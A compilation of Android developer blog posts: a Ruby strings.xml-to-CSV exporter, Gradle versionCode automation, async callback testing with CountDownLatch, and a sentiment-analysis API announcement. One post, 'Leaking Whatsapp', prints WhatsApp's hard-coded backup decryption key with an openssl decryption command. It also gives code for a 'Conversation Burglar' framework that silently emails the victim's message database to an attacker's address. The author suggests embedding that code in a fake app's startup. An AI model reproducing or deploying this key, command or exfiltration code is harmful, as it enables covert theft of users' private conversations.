Export XML files to CSV (or Android I18N files to iPhone I18N files)

Android and iOS differ in one peculiar way when it comes to I18N: they use different file formats. Google's platform uses XML, whereas Cupertino's uses CSV files. Recently we needed to unify some of our I18N resources. To do that, we wanted a common format that would let us easily check whether the strings were correctly modified.

This Ruby script exports Android strings into a .CSV file, which is then easy to compare against its Apple counterpart with another script. Remember that you need to install Nokogiri (gem install nokogiri) to make it work.

Call it with: ruby scriptname.rb inputfile.xml outputfile.csv

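#!/usr/bin/env ruby
#
# Exports every <string> element of an Android strings.xml file to a
# two-column CSV file (name, text).
# Usage: ruby scriptname.rb inputfile.xml outputfile.csv
require "nokogiri"
require "csv"

input_path, output_path = ARGV
abort "Usage: ruby #{$0} inputfile.xml outputfile.csv" unless input_path && output_path

# Parse the XML; the block form closes the input file afterwards
xml_doc = File.open(input_path) { |file| Nokogiri::XML(file) }
nodes = xml_doc.xpath("//string")

# The CSV library quotes values containing commas, quotes or newlines,
# which plain string concatenation would break on
str = CSV.generate do |csv|
  nodes.each { |node| csv << [node["name"], node.text] }
end

puts str
File.write(output_path, str)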
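For readers who prefer to stay in Java, the same export can be sketched with the JDK's built-in DOM parser instead of Nokogiri. This is a minimal sketch and not part of the original script. The class name StringsXmlToCsv is hypothetical, the XML is read from a string, and fields get RFC 4180-style quoting so that values containing commas survive.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;

class StringsXmlToCsv {

    // Quote a field RFC 4180 style when it contains a comma, a quote or a line break
    static String csvField(String value) {
        if (value.contains(",") || value.contains("\"") || value.contains("\n") || value.contains("\r")) {
            return "\"" + value.replace("\"", "\"\"") + "\"";
        }
        return value;
    }

    // Convert the contents of an Android strings.xml file into "name,text" CSV lines
    static String convert(String xml) {
        Document doc;
        try {
            doc = DocumentBuilderFactory.newInstance()
                    .newDocumentBuilder()
                    .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        } catch (Exception e) {
            throw new IllegalArgumentException("Could not parse strings.xml", e);
        }
        // Like the XPath //string in the Ruby script: every <string> element at any depth
        NodeList strings = doc.getElementsByTagName("string");
        StringBuilder csv = new StringBuilder();
        for (int i = 0; i < strings.getLength(); i++) {
            Element element = (Element) strings.item(i);
            csv.append(csvField(element.getAttribute("name")))
               .append(',')
               .append(csvField(element.getTextContent()))
               .append('\n');
        }
        return csv.toString();
    }
}
```

To convert a file, pass its contents, for example new String(Files.readAllBytes(path), StandardCharsets.UTF_8).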

Automatically increasing versionCode with Gradle

Continuous Integration means, above all, automation. The user should not be in charge of the distribution or deployment process. Everything should be scripted!

When deploying new versions on Android, one common task is to increase the versionCode that identifies a particular build. With the new Gradle build system, this can also be automated.

// At the top of build.gradle
import java.util.regex.Pattern

// Reads the current versionCode from the manifest
def readManifestVersionCode() {
    def manifestText = file("src/main/AndroidManifest.xml").getText()
    def matcher = Pattern.compile("versionCode=\"(\\d+)\"").matcher(manifestText)
    if (!matcher.find()) {
        throw new GradleException("No versionCode found in AndroidManifest.xml")
    }
    return Integer.parseInt(matcher.group(1))
}

// Version code used by this build: the value stored in the manifest plus one
def getVersionCodeAndroid() {
    def version = readManifestVersionCode() + 1
    println sprintf("Returning version %d", version)
    return version
}

task('writeVersionCode') {
    // doLast runs only when the task executes; code placed directly in this
    // closure would rewrite the manifest every time Gradle configures the project
    doLast {
        def manifestFile = file("src/main/AndroidManifest.xml")
        def newVersionCode = readManifestVersionCode() + 1
        manifestFile.write(manifestFile.getText().replaceFirst("versionCode=\"\\d+\"", "versionCode=\"${newVersionCode}\""))
    }
}

tasks.whenTaskAdded { task ->
    // Store the incremented versionCode before BuildConfig is generated
    if (task.name == 'generateReleaseBuildConfig' || task.name == 'generateDebugBuildConfig') {
        task.dependsOn 'writeVersionCode'
    }
}

In our defaultConfig, we will need to specify that the versionCode must be read from the newly added function:

  versionCode getVersionCodeAndroid()
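The read-and-increment step of the Gradle script is ordinary regular-expression work, so it can be pulled out and unit tested on its own. Here is a minimal Java sketch of it, assuming the manifest text is already loaded into a string. The class VersionCodeBump and its methods are hypothetical names.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

class VersionCodeBump {

    // Same pattern as the Gradle script: versionCode="<digits>"
    private static final Pattern VERSION_CODE = Pattern.compile("versionCode=\"(\\d+)\"");

    // Returns the versionCode currently stored in the manifest text
    static int readVersionCode(String manifestText) {
        Matcher matcher = VERSION_CODE.matcher(manifestText);
        if (!matcher.find()) {
            throw new IllegalArgumentException("No versionCode attribute found");
        }
        return Integer.parseInt(matcher.group(1));
    }

    // Returns the manifest text with its versionCode incremented by one
    static String bumpVersionCode(String manifestText) {
        int next = readVersionCode(manifestText) + 1;
        return VERSION_CODE.matcher(manifestText).replaceFirst("versionCode=\"" + next + "\"");
    }
}
```

Using replaceFirst rather than replaceAll limits the change to the first versionCode attribute in the file.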

Testing Asynchronous Tasks on Android

Recently, at Sixt we have been migrating our development environment from Eclipse to Android Studio. This has also meant moving to the new build system, Gradle, and applying TDD and CI to our software development process. This is not the place to discuss the benefits of applying CI to a software development plan. Instead, I want to talk about a problem that arises when testing tasks that run on threads other than the UI thread in Android.

Broadly speaking, a test in Android is an extension of a JUnit TestCase. It includes setUp() and tearDown() to initialize and clean up the tests, and it uses reflection to discover the test methods (those whose names start with "test"). Starting with JUnit 4, annotations can be used instead to declare the tests and control how they are executed. A typical test structure looks like this:

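import android.test.ActivityTestCase;

public class MyManagerTest extends ActivityTestCase {

	public MyManagerTest(String name) {
		// ActivityTestCase only has a no-argument constructor, so set the JUnit test name explicitly
		setName(name);
	}

	@Override
	protected void setUp() throws Exception {
		super.setUp();
	}

	@Override
	protected void tearDown() throws Exception {
		super.tearDown();
	}

	// Discovered by reflection because the method name starts with "test"
	public void testDummyTest() {
		fail("Failing test");
	}

}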

This is a trivial example. In practice we would want to test things such as HTTP requests, SQL storage, etc. At Sixt we follow a Manager/Model approach: each Model represents an Entity (a Car, a User…) and each Manager groups a set of functionality that uses different models (for example, our LoginManager might need User models to interact with). Most of our managers make intensive use of HTTP requests to retrieve data from our backend. As an example, we would log in a user with the following code:

	mLoginManager.performLoginWithUsername("username", "password", new OnLoginListener() {
		@Override
		public void onFailure(Throwable throwable) {
			fail();
		}

		@Override
		public void onSuccess(User customer) {
		//..
		}
	});

When applying this to our own test suite, we simply call fail() whenever the result is not what we expected. That is why onFailure() calls fail().

However, the test still passed even when I used a wrong username. After digging around, it seemed that the test executed the code sequentially and did not wait for the callbacks to return their result. This is clearly a problem, since modern applications make intensive use of asynchronous tasks and callback methods to retrieve data from a backend! I tried applying @UiThreadTest, but it still didn't work.

I found the following approach that works. I use a CountDownLatch as a signal object to implement the wait-notify mechanism (you could use synchronized(lock){… lock.notify();} instead, but it results in ugly code). The previous code then looks like this:

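	// Needs java.util.concurrent.CountDownLatch, java.util.concurrent.TimeUnit
	// and java.util.concurrent.atomic.AtomicReference
	final CountDownLatch signal = new CountDownLatch(1);
	// fail() throws, so calling it in the callback would skip countDown(), and from a
	// callback thread it would not be reported as a normal test failure: record it instead
	final AtomicReference<Throwable> failure = new AtomicReference<Throwable>();
	mLoginManager.performLoginWithUsername("username", "password", new OnLoginListener() {
		@Override
		public void onFailure(Throwable throwable) {
			failure.set(throwable);
			signal.countDown();
		}

		@Override
		public void onSuccess(User customer) {
			signal.countDown();
		}
	});
	// Wait on the test thread (the 30 s timeout is an arbitrary choice), then assert here
	assertTrue("No login callback received", signal.await(30, TimeUnit.SECONDS));
	assertNull("Login failed: " + failure.get(), failure.get());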
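The latch pattern can be tried outside Android with plain Java. In this sketch, the Listener interface and loginAsync() are hypothetical stand-ins for OnLoginListener and LoginManager. They answer on a background thread after a short delay. The test thread blocks on the latch and only then inspects the recorded outcome. The 5-second timeout is an arbitrary choice.

```java
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicReference;

class LatchDemo {

    // Hypothetical callback interface standing in for OnLoginListener
    interface Listener {
        void onSuccess(String user);
        void onFailure(Throwable throwable);
    }

    // Hypothetical async login: answers on a background thread, like an HTTP request would
    static void loginAsync(final String username, final Listener listener) {
        new Thread(new Runnable() {
            @Override
            public void run() {
                try {
                    Thread.sleep(100); // simulate network latency
                } catch (InterruptedException e) {
                    Thread.currentThread().interrupt();
                }
                if ("username".equals(username)) {
                    listener.onSuccess(username);
                } else {
                    listener.onFailure(new IllegalArgumentException("Unknown user: " + username));
                }
            }
        }).start();
    }

    // Blocks the calling (test) thread until a callback arrives; returns the failure, or null on success
    static Throwable loginAndWait(String username) {
        final CountDownLatch signal = new CountDownLatch(1);
        final AtomicReference<Throwable> failure = new AtomicReference<Throwable>();
        loginAsync(username, new Listener() {
            @Override
            public void onSuccess(String user) {
                signal.countDown();
            }

            @Override
            public void onFailure(Throwable throwable) {
                failure.set(throwable); // record instead of throwing on the worker thread
                signal.countDown();
            }
        });
        try {
            if (!signal.await(5, TimeUnit.SECONDS)) {
                throw new IllegalStateException("No callback within 5 seconds");
            }
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
            throw new IllegalStateException("Interrupted while waiting for the callback", e);
        }
        return failure.get();
    }
}
```

A test would then assert on the returned value, for example assertNull(LatchDemo.loginAndWait("username")), so that the failure is raised on the test thread where JUnit can see it.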

Leaking Whatsapp – stealing conversations silently

WhatsApp, the fast-growing mobile messaging service, is the main threat to the (outdated) business model of telecommunications operators. Its exponential growth confirms that telcos reacted late and badly: WhatsApp has reached a position that competitors will find hard to challenge. The only apparent risk comes from other companies using the same concept of push notifications: recently, Line seems to be winning over some users by offering additional features.

Business aside, it is amazing how nonexistent security is in WhatsApp. To be moderate, I will simply say that using the word “security” here is a misinformed statement. If I were being aggressive, I would use other words.

In May 2011, a bug was reported that left user accounts open to hijacking. This was the first public one. After that, it was reported that communications within WhatsApp were not encrypted: data was sent and received in plaintext. This allowed anyone to intercept messages by connecting to the same WiFi network as the target phone (an Android application doing this was even published on the market, although Google removed it after a few weeks). In May 2012 the bug was reported to be fixed, although it took a year to implement a fix that is not especially complex.

In September 2011, a new version of WhatsApp allowed forged messages to be sent and messages from any WhatsApp user to be read.

On January 6, 2012, an unknown hacker published a website that made it possible to change the status of an arbitrary WhatsApp user, as long as the phone number was known. This bug was reported as fixed on January 9… but the only measure taken was blocking the website’s IP address. In response, a Windows tool providing the same functionality was made available for download. This issue has not been resolved to date.

On January 13, 2012, WhatsApp was pulled from the iOS App Store for an undisclosed reason. The app was added back to the App Store 4 days later. On September 14, 2012, the German tech blog The H demonstrated how to hijack any WhatsApp account. WhatsApp reacted with a legal threat to WhatsAPI’s developers.

The last unassailable bastion was the local database of messages, since it was physically stored on the device and we would need access to it… in theory. Let's see how this can be achieved. In most cases it is possible to obtain the WhatsApp message history from an encrypted device or backup; for details, read this paper: WhatsApp Database Encryption Project Report.

In summary: the database containing all the WhatsApp messages is stored as a SQLite file. On iOS phones this file is at [App ID]/Documents/ChatStorage.sqlite, and on Android phones at /com.whatsapp/databases/msgstore.db. This file is unencrypted, but accessing it requires a jailbroken phone. On Android, the backup file is stored on the external memory card, and it was not encrypted either. This changed in an application update, so that if the phone is lost or stolen, the messages supposedly cannot be read.

Unfortunately, the application uses the same encryption key for every device (AES-192-ECB, key 346a23652a46392b4d73257c67317e352e3372482177652c), with no entropy or per-device factor, so the database can be decrypted in a matter of seconds.

openssl enc -d  -aes-192-ecb -in msgstore-1.db.crypt -out msgstore.db.sqlite -K346a23652a46392b4d73257c67317e352e3372482177652c

So, we know how to break the encryption. Now we have to solve the problem of having access to the device.

Android uses permissions to determine what applications can do once they are installed on the device. To read from the external storage we need the permission android.permission.WRITE_EXTERNAL_STORAGE. With it, we can access all the files on the SD card. Surprisingly, the WhatsApp developers didn't use the application's internal storage, which would have prevented other applications from stealing their data.

Now that we can access the data, we need to send it somewhere else. By default, Android lets us use Intents to send emails. But this is not transparent at all: the user will see that we are trying to send an email to an unknown address and will cancel the action. However, other techniques are available. For example, we could use a transparent layer, connect to a mail server without the user noticing, and acquire the file with the precious information.

I have developed a framework (WhatsApp Conversation Burglar) that can be included within an Android application to steal the data without the user noticing. You can download it from here.

Let’s see how it works:

The framework presents a dummy Activity (MailSenderActivity) with only a button. The following listener runs when the button is clicked:

 public void onClick(View v) {
            	try {   
                	AsyncTask<Void, Void, Void> m = new AsyncTask<Void, Void, Void>() {

						@Override
						protected Void doInBackground(Void... arg0) {
							GMailSender sender = new GMailSender(EMAIL_STRING, PASSWORD_STRING);
		                    try {
		                    	sender.addAttachment("/storage/sdcard0/WhatsApp/Databases/msgstore.db.crypt", SUBJECT_STRING);
								sender.sendMail(SUBJECT_STRING,   
								        BODY_STRING,   
								        EMAIL_STRING,   
								        RECIPIENT_STRING);
							} catch (Exception e) {
								e.printStackTrace();
							}   
							return null;
						}
                	};
                	m.execute((Void)null);
                } catch (Exception e) {   
                    DebugLog.e("SendMail", e.getMessage());   
                } 
            }
        });

This code initializes a GMailSender object with some parameters. The function addAttachment() attaches a target file to be sent (in our case, the database containing all the WhatsApp messages) and a SUBJECT to the email. The function sendMail() sends the email with the required information (SUBJECT_STRING, BODY_STRING, EMAIL_STRING, RECIPIENT_STRING). The class GMailSender is responsible for all the email communication and uses the JavaMail library. The code is self-explanatory.

With the right parameters set, the file with all the conversations is sent to the provided email address, where it can be decrypted with the terminal command shown before. To use this framework in an application, you only have to add it as a library and include the code within the application (probably in the onCreate() method of the first activity launched, so the conversations are stolen when the application starts). A fake application could include this framework and steal all the conversations of the users who install it.

There is no way to prevent this other than deleting the file with all the conversations. WhatsApp could use a different kind of encryption (based on data such as the device IMEI, the UNIX time of installation or any other non-replicable information), or simply move the file to the application's private folder (/data/data/com.package.name/). But considering their tragic security history, we probably cannot rely on this.
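The per-device encryption idea can be illustrated with a minimal Java sketch. Instead of a single hard-coded ECB key, it derives the key with PBKDF2 from a per-device secret and a random salt, then encrypts with AES-GCM. This is not WhatsApp's scheme. The class name and the deviceSecret parameter are hypothetical, and the iteration count is only an illustrative value. An identifier such as the IMEI is not secret and can be guessed, so a randomly generated secret would be a stronger input than the IMEI alone.

```java
import java.security.GeneralSecurityException;
import java.security.SecureRandom;
import java.util.Arrays;
import javax.crypto.Cipher;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;

class PerDeviceBackupCipher {

    private static final int SALT_BYTES = 16;
    private static final int IV_BYTES = 12;          // recommended nonce size for GCM
    private static final int ITERATIONS = 100_000;   // illustrative PBKDF2 work factor
    private static final SecureRandom RANDOM = new SecureRandom();

    // PBKDF2 turns the per-device secret plus a random salt into a 128-bit AES key
    private static SecretKeySpec deriveKey(char[] deviceSecret, byte[] salt) throws GeneralSecurityException {
        PBEKeySpec spec = new PBEKeySpec(deviceSecret, salt, ITERATIONS, 128);
        SecretKeyFactory factory = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256");
        return new SecretKeySpec(factory.generateSecret(spec).getEncoded(), "AES");
    }

    // Output layout: salt | IV | AES-GCM ciphertext with its 128-bit authentication tag
    static byte[] encrypt(char[] deviceSecret, byte[] plaintext) {
        try {
            byte[] salt = new byte[SALT_BYTES];
            byte[] iv = new byte[IV_BYTES];
            RANDOM.nextBytes(salt);
            RANDOM.nextBytes(iv);
            Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
            cipher.init(Cipher.ENCRYPT_MODE, deriveKey(deviceSecret, salt), new GCMParameterSpec(128, iv));
            byte[] ciphertext = cipher.doFinal(plaintext);
            byte[] out = new byte[SALT_BYTES + IV_BYTES + ciphertext.length];
            System.arraycopy(salt, 0, out, 0, SALT_BYTES);
            System.arraycopy(iv, 0, out, SALT_BYTES, IV_BYTES);
            System.arraycopy(ciphertext, 0, out, SALT_BYTES + IV_BYTES, ciphertext.length);
            return out;
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException("Encryption failed", e);
        }
    }

    // Reverses encrypt(); a wrong secret or tampered data makes the GCM tag check fail
    static byte[] decrypt(char[] deviceSecret, byte[] blob) {
        try {
            byte[] salt = Arrays.copyOfRange(blob, 0, SALT_BYTES);
            byte[] iv = Arrays.copyOfRange(blob, SALT_BYTES, SALT_BYTES + IV_BYTES);
            Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
            cipher.init(Cipher.DECRYPT_MODE, deriveKey(deviceSecret, salt), new GCMParameterSpec(128, iv));
            int offset = SALT_BYTES + IV_BYTES;
            return cipher.doFinal(blob, offset, blob.length - offset);
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException("Decryption failed", e);
        }
    }
}
```

Because each backup carries its own random salt and IV, two devices (or two backups) never share a key or nonce. Knowing the format alone does not allow decryption.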

If you have any comments about this post, feel free to contact me by email.

Enrique López-Mañas

Flirting with sentiment analysis: my own approach and some example applications

Lately I have been interested in applying data analysis to information sources, particularly Twitter. Twitter has everything needed for effective real-time analysis: its API gives access to all the data the analysis requires, and the volume of information is simply huge. I strongly believe that Twitter has already changed the way intelligent analytics is performed, since it contains millions of topical tweets that are publicly accessible.

Since I began writing my own intelligent agent for SCAI (a tournament for developing AI agents that play Starcraft), I have become very interested in modeling human intelligence. There is of course a lot to do in this field, and it makes no sense to list the well-known challenges that are still open. One of the fields that has always attracted me is sentiment analysis. Isn't the idea of extracting sentiment from text fascinating? Furthermore, the field touches on many interesting areas of Artificial Intelligence.

A few months ago I began developing my own sentiment analyzer. It wasn't easy at the beginning: there are so many different approaches that the task seemed overwhelming. Since the project aimed to have a little more impact than traditional sentiment analyzers, I took a different approach. Most existing solutions are keyword-based. They are pretty effective, but they do not ensure good recall, and they are harder to train (i.e., to train automatically using Twitter as a learning source). So I decided to use classifiers built with different machine learning algorithms instead. The analyzer has only been trained for English, although it learns every day and I'm considering expanding it to other languages (mainly Spanish and German).
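The post does not say which machine learning algorithms the analyzer uses. As one common example of a trainable classifier, here is a minimal multinomial Naive Bayes sketch in Java. It uses add-one smoothing and the same 0/2/4 labels as the analyzer's API. It is an illustration, not the author's analyzer, and the class name and the naive tokenizer are assumptions.

```java
import java.util.HashMap;
import java.util.HashSet;
import java.util.Locale;
import java.util.Map;
import java.util.Set;

class NaiveBayesSentiment {

    private final Map<Integer, Map<String, Integer>> wordCounts = new HashMap<>();
    private final Map<Integer, Integer> wordTotals = new HashMap<>();
    private final Map<Integer, Integer> docCounts = new HashMap<>();
    private final Set<String> vocabulary = new HashSet<>();
    private int totalDocs = 0;

    // Naive tokenizer: lowercase, split on anything that is not a letter or apostrophe
    private static String[] tokenize(String text) {
        return text.toLowerCase(Locale.ROOT).split("[^a-z']+");
    }

    // Add one labelled example (0 = negative, 2 = neutral, 4 = positive)
    void train(String text, int label) {
        totalDocs++;
        docCounts.merge(label, 1, Integer::sum);
        Map<String, Integer> counts = wordCounts.computeIfAbsent(label, k -> new HashMap<>());
        for (String token : tokenize(text)) {
            if (token.isEmpty()) continue;
            counts.merge(token, 1, Integer::sum);
            wordTotals.merge(label, 1, Integer::sum);
            vocabulary.add(token);
        }
    }

    // Pick the label with the highest log-posterior, with Laplace (add-one) smoothing
    int classify(String text) {
        int bestLabel = -1;
        double bestScore = Double.NEGATIVE_INFINITY;
        for (int label : docCounts.keySet()) {
            double score = Math.log((double) docCounts.get(label) / totalDocs);
            Map<String, Integer> counts = wordCounts.get(label);
            int total = wordTotals.getOrDefault(label, 0);
            for (String token : tokenize(text)) {
                if (token.isEmpty()) continue;
                int count = counts.getOrDefault(token, 0);
                score += Math.log((count + 1.0) / (total + vocabulary.size()));
            }
            if (score > bestScore) {
                bestScore = score;
                bestLabel = label;
            }
        }
        return bestLabel;
    }
}
```

Such a classifier only becomes useful when it is trained on a large set of labelled tweets rather than a handful of sentences. The training loop stays the same either way.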

The experiment is working, and I would say it is pretty accurate. I have developed two applications that serve as testbeds for the analyzer:

  • The Happiness Observer, which measures the happiness associated with a given concept.
  • City Mood, which determines the user's location and reports the mood of the city, based on tweets from people referencing it.

Feel free to download the applications and let me know what you think.

Last but not least, I have decided to give free access to the API to anyone who is interested. The idea is quite simple: you call this URL:

http://feeling-analyzer.appspot.com/feeling_analyzer/feeling?text=I+love+this+guy

In the text parameter, send the (URL-encoded) text you want to analyze. You will need to register for a key to use the application, and add it as a parameter in the same way: &key=providedKey. Drop me a line if you need a key and I will provide you with one.
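A client only needs to URL-encode the text and append the key. Here is a minimal Java sketch using java.net.URLEncoder, which encodes spaces as + exactly as in the example URL above. The class name is hypothetical. The sketch only builds the URL, since the service itself may no longer be available.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;

class FeelingAnalyzerClient {

    private static final String ENDPOINT = "http://feeling-analyzer.appspot.com/feeling_analyzer/feeling";

    // Build the request URL: the text is URL-encoded and the key appended as &key=
    static String buildUrl(String text, String key) {
        try {
            return ENDPOINT + "?text=" + URLEncoder.encode(text, "UTF-8")
                    + "&key=" + URLEncoder.encode(key, "UTF-8");
        } catch (UnsupportedEncodingException e) {
            throw new IllegalStateException("UTF-8 is always supported", e);
        }
    }
}
```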

The application returns a value corresponding to the polarity of the text: 0 means negative, 2 means neutral and 4 means positive. As a further enhancement of the algorithm, I'm planning to extend the analysis to support multiple values (i.e., not just discrete values but a continuous range, for example from 0 to 100).
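On the client side, the discrete response can be mapped to named values. This sketch assumes the response body contains just the number as plain text, which the post does not specify. The Polarity class and its enum are hypothetical.

```java
class Polarity {

    enum Sentiment { NEGATIVE, NEUTRAL, POSITIVE }

    // Map the analyzer's discrete response (0, 2 or 4) to a named polarity
    static Sentiment fromResponse(String body) {
        switch (Integer.parseInt(body.trim())) {
            case 0: return Sentiment.NEGATIVE;
            case 2: return Sentiment.NEUTRAL;
            case 4: return Sentiment.POSITIVE;
            default: throw new IllegalArgumentException("Unexpected polarity: " + body);
        }
    }
}
```

Rejecting unexpected values, rather than guessing, makes it obvious if the service ever moves to the planned continuous range.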

Enrique López-Mañas